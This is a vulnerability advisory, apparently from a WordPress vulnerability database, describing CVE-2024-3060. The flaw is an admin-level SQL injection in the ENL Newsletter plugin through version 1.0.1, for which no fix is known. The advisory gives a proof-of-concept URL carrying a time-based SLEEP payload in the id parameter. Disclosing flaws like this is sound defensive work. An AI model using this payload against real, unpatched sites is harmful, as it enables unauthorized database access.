ENL Newsletter <= 1.0.1 – Admin+ SQL Injection | CVE 2024-3060

Description

The plugin does not sanitize and escape a parameter before using it in a SQL statement, allowing admin+ to perform SQL injection attacks

Proof of Concept

As an admin open a link like:

http://example.com/wp-admin/admin.php?page=enl-campaigns&action=campaign-run&id=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))nQIP)

There will be a delay indicating that the injection has succeeded.

Affects Plugins

enl-newsletter

No known fix

References

CVE

CVE-2024-3060

Classification

Type

SQLI

OWASP top 10

A1: Injection

CWE

CWE-89

Miscellaneous

Original Researcher

Bob Matyas

Submitter

Bob Matyas

Submitter website

https://www.bobmatyas.com

Submitter twitter

bobmatyas

Verified

Yes

WPVDB ID

7740646d-f3ea-4fc7-b35e-8b4a6821e178

Timeline

Publicly Published

2024-04-05 (about 1 months ago)

Added

2024-04-05 (about 1 months ago)

Last Updated

2024-04-05 (about 1 months ago)

Other

Published

Title

Published

2014-08-01

Title

Paid Downloads < 2.21 - SQL Injection

Published

2015-09-05

Title

WP Limit Login Attempts <= 2.0.0 - Unauthenticated SQL Injection

Published

2023-01-20

Title

RapidLoad Power-Up for Autoptimize < 1.6.36 - Subscriber+ SQLi

Published

2022-02-02

Title

NotificationX < 2.3.9 - Unauthenticated Blind SQL Injection

Published

2014-08-01

Title

WP-Predict 1.0 - Blind SQL Injection